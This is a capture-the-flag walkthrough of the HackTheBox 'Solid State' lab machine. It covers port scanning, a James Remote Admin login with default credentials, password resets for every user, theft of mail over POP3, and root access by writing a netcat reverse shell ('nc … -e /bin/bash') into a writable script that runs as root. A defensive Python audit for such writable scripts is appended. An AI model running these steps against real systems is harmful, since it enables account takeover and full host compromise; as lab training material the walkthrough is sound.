HackTheBox Solid State: 1 Walkthrough

Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux


Vulnerable Machine : Solid State: 1


Let’s start hacking and breach the security of this machine


Scanning Phase : Let's start by finding our attacking machine's IP address.
Syntax used : ifconfig
Results : 192.168.146.131


Now let's scan the local network to which both the attacking machine and the vulnerable machine are connected.
Syntax used : arp-scan --local
Victim machine : 192.168.146.133


Enumeration Phase : Now use nmap to scan the services running on the open ports.
Syntax used : nmap -A 192.168.146.133 -p- --open -Pn
Results : HTTP service is active on port 80, POP3 is active on port 110 and James admin on port 4555


Now browse to the IP in a browser to see the web page on port 80.




Now try to connect to port 4555 using telnet.
Syntax used : telnet 192.168.146.133 4555
Results : I got a prompt asking for a login id


Note: the image above shows that it is James Remote Admin asking for the login id.
So I searched Google and found an exploit for James Remote Admin.


In the exploit code I found the default login credentials of James Remote Admin.
Default credentials : user = root and pwd = root


After providing these credentials at the prompt, I got something useful.
I used the following commands in this telnet session.

Command : listusers
Command : setpassword username password
Explanation :
setpassword : sets the new password
username : the user whose password is to be changed
password : the new password

So I changed the passwords of all the users to 'paras'.


Now try to connect to POP3 using telnet.
Syntax used : telnet 192.168.146.133 110
Results : I got connected and used POP3 commands to log in as mindy
Commands used :
user mindy
pass paras
retr 2 (to retrieve all the data)



Now, with the credentials above, try to log in over SSH.
Syntax used : ssh mindy@192.168.146.133
Pass for mindy : P@55W0rd1!2@
Results : low-privileged shell and user flag

Next, we write our own Python code into tmp.py on the victim machine and, at the same time, start netcat listening on port 9999, the port used in the script.
Log in over SSH again with the following command:
ssh mindy@192.168.146.133 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"


After that, run the following while netcat is still listening:


echo 'import os; os.system("/bin/nc 192.168.146.131 9999 -e /bin/bash")' > /opt/tmp.py


Results : root flag
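
The last step only works because a low-privileged user can change a script that ends up running as root. The audit below is an added example, not part of the original walkthrough: it lists root-owned files under a directory that other users can modify or replace. The names audit_scripts and demo are hypothetical, and the demo tree is constructed, with the current user standing in for root.

```python
import os
import stat
import tempfile


def audit_scripts(root_dir, owner_uid=0):
    """List regular files owned by owner_uid that other users can change or replace."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root_dir):
        dir_mode = os.lstat(dirpath).st_mode
        # Without the sticky bit, anyone who can write the directory can swap its files.
        dir_open = bool(dir_mode & stat.S_IWOTH) and not dir_mode & stat.S_ISVTX
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode) or st.st_uid != owner_uid:
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append((path, "file is other-writable"))
            elif dir_open:
                findings.append((path, "directory is other-writable"))
    return findings


def demo():
    """Audit a constructed tree; the current user stands in for root."""
    with tempfile.TemporaryDirectory() as base:
        layout = {"tmp.py": 0o777, "safe.py": 0o755, "drop/job.py": 0o644}
        os.mkdir(os.path.join(base, "drop"))
        for rel, mode in layout.items():
            path = os.path.join(base, rel)
            with open(path, "w") as fh:
                fh.write("print('scheduled job')\n")
            os.chmod(path, mode)
        os.chmod(os.path.join(base, "drop"), 0o777)
        found = audit_scripts(base, owner_uid=os.getuid())
        return sorted((os.path.relpath(p, base), why) for p, why in found)


if __name__ == "__main__":
    for path, why in audit_scripts("/opt"):
        print(f"{path}: {why}")
```

Any file it reports should have its mode tightened (for example to 0755, owned by root) before it is left in a path that a root job executes.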
